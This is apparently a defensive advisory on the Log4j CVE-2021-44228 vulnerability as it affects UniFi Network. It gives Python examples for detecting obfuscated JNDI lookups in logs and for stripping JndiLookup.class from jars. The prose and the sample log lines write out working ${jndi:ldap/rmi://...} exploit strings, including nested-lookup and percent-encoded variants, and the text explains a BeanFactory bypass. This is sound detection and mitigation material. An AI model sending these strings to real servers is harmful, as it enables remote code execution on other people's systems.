UniFi Network applications are being targeted in the same way as the VMware Horizon servers that were attacked through the Log4j vulnerability.
CVE-2021-44228 is a critical vulnerability affecting multiple versions of Apache Log4j 2 that allows unauthenticated remote code execution. The attacker sends a specially crafted HTTP request (or any other input that ends up in a log message) to a server that logs it with a vulnerable Log4j 2. Logging frameworks normally treat the messages they receive as plain text and only apply basic formatting; Log4j 2.0, however, added lookups, a ${...} substitution syntax that inserts dynamically resolved values into log entries.
Multiple types of lookups were provided in Log4j 2.0, such as "Context Map Lookup", "Date Lookup", "JVM Input Arguments Lookup (JMX)", "Web Lookup" and "JNDI Lookup". The Java Naming and Directory Interface (JNDI) is a Java API for accessing a variety of naming and directory services such as LDAP, DNS and RMI.
The JNDI lookup was not restricted to the local environment: a string such as ${jndi:ldap://attacker-host/a} makes Log4j connect to whatever host the attacker names. An attacker therefore sends an HTTP request carrying such a string in a field that gets logged (User-Agent, a login name, the request path). When Log4j formats the message it resolves the lookup, the server connects over the internet to the attacker's LDAP (or RMI) server, and that server replies with a reference to a Java class hosted by the attacker, which the victim JVM downloads and executes.
Exploits and proof-of-concept code for CVE-2021-44228 were published online within hours of disclosure. Any Java application that logs user-controlled input with an unpatched Log4j 2 (versions 2.0-beta9 through 2.14.1; 2.15.0 shipped only an incomplete fix) is at risk, and the vulnerable library is frequently bundled inside third-party software such as UniFi Network rather than in code the operator wrote.
The attack has two phases. In the first, the attacker sends the crafted request and the victim's Log4j performs the JNDI lookup against the attacker's server. In the second, the malicious payload is fetched from the attacker's server and executed on the victim. Both phases are visible to defenders: the first leaves the lookup string in the application's or reverse proxy's logs, and the second produces an outbound LDAP or RMI connection from a server that should never make one.
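The first phase can be hunted for in web-server or application logs. The following is an added example written for this article, not code from the original page or from Ubiquiti; it normalizes each log line before matching, because real attackers rarely send the literal string ${jndi:ldap://...} and instead percent-encode it or wrap it in nested ${lower:...}, ${upper:...} and ${x:-y} (default value) lookups that Log4j resolves from the inside out. The log lines, IP addresses and hostnames are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Innermost obfuscation lookups (no '${' inside them). Repeated substitution
# peels nested lookups from the inside out, the same order Log4j resolves them.
_LOWER_UPPER = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")   # ${::-j} or ${env:NOPE:-j} -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /manage/account/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:03:40 +0000] "GET / HTTP/1.1" 302 0 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:14:04:02 +0000] "GET / HTTP/1.1" 302 0 "-" "${${lower:j}${lower:n}${::-d}i:${lower:rmi}://198.51.100.9:1099/x}"',
    '198.51.100.11 - - [10/Dec/2021:14:05:19 +0000] "POST /api/login HTTP/1.1" 400 0 "%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.11%2Fx%7D" "curl/7.79"',
]


def normalize(text, max_rounds=10):
    """Percent-decode (including double encoding) and collapse nested
    lower/upper/default-value lookups until the string stops changing."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        new = _LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_payloads(text):
    """Return every ${jndi:...} lookup present after normalization."""
    return _JNDI.findall(normalize(text))


def scan_log_lines(lines):
    """Return (line_index, normalized_payload) for each line carrying a JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines):
        for payload in find_jndi_payloads(line):
            hits.append((idx, payload))
    return hits


if __name__ == "__main__":
    for idx, payload in scan_log_lines(SAMPLE_LOGS):
        print(f"line {idx}: {payload}")
```

The normalized payload is what you want to alert on and to extract the attacker's callback host from; matching only the raw bytes of the log line would miss the third and fourth sample lines entirely. Lookups that depend on runtime state (${env:...}, ${sys:...}, ${date:...}) are deliberately not resolved here, since the detector cannot know the victim's environment.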
Version 2.16.0 has been released with the JNDI lookup disabled by default and message lookups removed entirely. Upgrade to Log4j 2.16.0 or later. For UniFi Network this means upgrading the application itself, since it bundles its own copy of Log4j.
If upgrading to version 2.16.0 is not possible at the moment, the following workaround mitigates the vulnerability: disable the lookup functionality so that no remote server is ever contacted.
The lookup is performed through the JNDI API (InitialContext().lookup("lookup address")). Restricting remote class loading with the JVM property com.sun.jndi.ldap.object.trustURLCodebase=false (the default since Java 8u191) blocks the simplest payload, but it is not a fix: the attacker's LDAP response can instead name a factory class already on the classpath, such as org.apache.naming.factory.BeanFactory shipped with Tomcat, which instantiates an object and evaluates attacker-supplied expressions without loading anything from a remote codebase. The JNDI lookup itself therefore has to be disabled. On Log4j 2.10 and later, set the system property log4j2.formatMsgNoLookups=true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true); on any 2.x version, remove the JndiLookup class from the log4j-core jar so that lookups against remote servers cannot be resolved at all. The formatMsgNoLookups setting was later shown to be insufficient in some non-default configurations (CVE-2021-45046), so removing the class, or upgrading, is the more reliable option.
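The class-removal workaround is usually done with zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class, but on an appliance you also want to confirm which version is bundled and verify the result. The following is an added example for this article, not code from the original page or from the Log4j or UniFi projects; it reads the version from the jar manifest, reports whether JndiLookup.class is present, rewrites the jar without it, and rescans. Because the real jar cannot be shipped here, make_sample_jar() builds a constructed stand-in containing only a manifest and placeholder class entries; the version threshold and the idea that "mitigated" means the class is gone are the example's own assumptions.

```python
import os
import re
import shutil
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 16, 0)   # assumption: versions at or above this need no workaround


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); pre-release tags such as '2.0-beta9' -> (2, 0, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else (0, 0, 0)


def log4j_version(jar_path):
    """Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    with zipfile.ZipFile(jar_path) as zf:
        if "META-INF/MANIFEST.MF" not in zf.namelist():
            return None
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def scan_jar(jar_path):
    """Report version, presence of JndiLookup.class and whether the workaround is still needed."""
    version = log4j_version(jar_path)
    with zipfile.ZipFile(jar_path) as zf:
        has_jndi = JNDI_CLASS in zf.namelist()
    # Unknown version is treated as vulnerable whenever the class is present.
    needs_mitigation = has_jndi and (version is None or version_tuple(version) < FIXED_VERSION)
    return {"path": jar_path, "version": version,
            "has_jndi_lookup": has_jndi, "needs_mitigation": needs_mitigation}


def remove_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class (equivalent to zip -q -d). Returns True if removed."""
    with zipfile.ZipFile(jar_path) as zf:
        if JNDI_CLASS not in zf.namelist():
            return False
    tmp = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar_path)   # atomic swap so a crash never leaves a half-written jar
    return True


def make_sample_jar(path, version="2.14.1"):
    """Constructed stand-in for log4j-core (placeholder bytes, not real class files)."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n\r\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")


def demo():
    """Build the sample jar in a temp dir, scan it, strip the class, rescan."""
    workdir = tempfile.mkdtemp(prefix="log4j-demo-")
    jar = os.path.join(workdir, "log4j-core-2.14.1.jar")
    make_sample_jar(jar, "2.14.1")
    before = scan_jar(jar)
    removed = remove_jndi_lookup(jar)
    after = scan_jar(jar)
    shutil.rmtree(workdir)
    return {"before": before, "removed": removed, "after": after}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two caveats when running this against a real deployment: the application must be stopped and restarted for the rewritten jar to take effect, and log4j-core is frequently nested inside a .war or uber-jar, which this scanner does not descend into, so also search the filesystem for any JndiLookup.class extracted from such archives.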